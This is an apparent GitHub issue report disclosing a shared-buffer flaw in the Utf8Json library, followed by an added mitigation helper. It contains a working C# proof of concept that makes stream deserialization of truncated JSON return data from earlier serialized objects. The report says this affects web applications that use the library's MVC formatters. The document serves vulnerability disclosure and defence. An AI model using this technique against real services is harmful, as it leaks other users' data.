Utf8Json
Deserialize from stream introduces a serious vulnerability due to shared buffers
I have encountered an issue when implementing error handling for malformed JSON in my web application: instead of "unexpected end of string" I was getting error messages with an "unexpected char" that was not even in the JSON. After some digging I discovered an exploit that enables an attacker to read data from previously serialized objects. This exploit can be used to target any web application that uses the MVC formatters in this repository or parses JSON from a stream using this library. The example below illustrates the issue.
```csharp
using System;
using System.IO;
using System.Text;

// Step 1: serialize a recognisable value many times so the pooled buffer holds it.
for (int i = 0; i < 1000; i++)
{
    Utf8Json.JsonSerializer.Serialize(new { SomeValue = "ABCDEFGHIJKLMNOPQRSTUVWKYZ1234567890" });
}

// Step 2: deserialize a truncated document from a stream. The reader works on the
// same pooled buffer and runs past the end of the real input into the stale bytes.
for (int i = 0; i < 1000; i++)
{
    try
    {
        var ms = new MemoryStream(Encoding.UTF8.GetBytes("{\"SomeValue\":\""));
        var value = Utf8Json.JsonSerializer.Deserialize<dynamic>(ms);
        // outputs 'ABCDEFGHIJKLMNOPQRSTUVWKYZ1234567890'
        Console.WriteLine(value["SomeValue"]);
    }
    catch (Exception ex)
    {
        // Some iterations throw ("unexpected char") instead of returning stale data.
    }
}
```
This issue is caused by sharing buffers that are never cleared and could be solved by clearing the buffers or by passing the length to the reader in addition to the buffer.
There is already an issue (#127) regarding this (6 months old) but it does not mention the security impact (especially for web applications using the formatters).
It seems serious to me.
Is there any update for this?
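One consumer-side mitigation for the shared-buffer problem described above, until the library itself clears its buffers or passes a length to the reader: drain the stream into an array sized exactly to the bytes actually received and hand that to the `byte[]` overload, so the reader's end-of-input is the real end of the payload rather than the end of a pooled buffer. This is an added example, not code from the Utf8Json project; `SafeJson.DeserializeExact` is a hypothetical helper, and it assumes that `JsonSerializer.Deserialize<T>(byte[])` treats the array length as the input length, so a truncated document surfaces as an exception instead of stale data.

```csharp
using System;
using System.IO;
using System.Text;
using Utf8Json;

public static class SafeJson
{
    // Hypothetical helper (not part of Utf8Json). Copies the stream into an array
    // with no slack, then uses the byte[] overload; the reader stops at the array
    // end, so a truncated document cannot read bytes left over from earlier calls.
    public static T DeserializeExact<T>(Stream stream)
    {
        using (var ms = new MemoryStream())
        {
            stream.CopyTo(ms);
            byte[] exact = ms.ToArray();   // length == bytes actually received
            return JsonSerializer.Deserialize<T>(exact);
        }
    }
}

public class Demo
{
    public static void Main()
    {
        // Constructed sample: fill the serializer's pooled buffer with a marker value.
        for (int i = 0; i < 1000; i++)
        {
            JsonSerializer.Serialize(new { SomeValue = "ABCDEFGHIJKLMNOPQRSTUVWKYZ1234567890" });
        }

        // Constructed sample: a request body cut off inside the string value.
        byte[] truncated = Encoding.UTF8.GetBytes("{\"SomeValue\":\"");

        try
        {
            var value = SafeJson.DeserializeExact<dynamic>(new MemoryStream(truncated));
            // Reaching this line with the marker value means the leak is still present.
            Console.WriteLine("LEAK: got '" + value["SomeValue"] + "' from truncated input");
        }
        catch (Exception ex)
        {
            // Expected outcome: the truncated document is rejected, no stale data returned.
            Console.WriteLine("Rejected truncated input: " + ex.GetType().Name + ": " + ex.Message);
        }
    }
}
```

The same wrapper can be used from a custom MVC input formatter in place of the stream overload, which keeps the fix in one place until the library is patched.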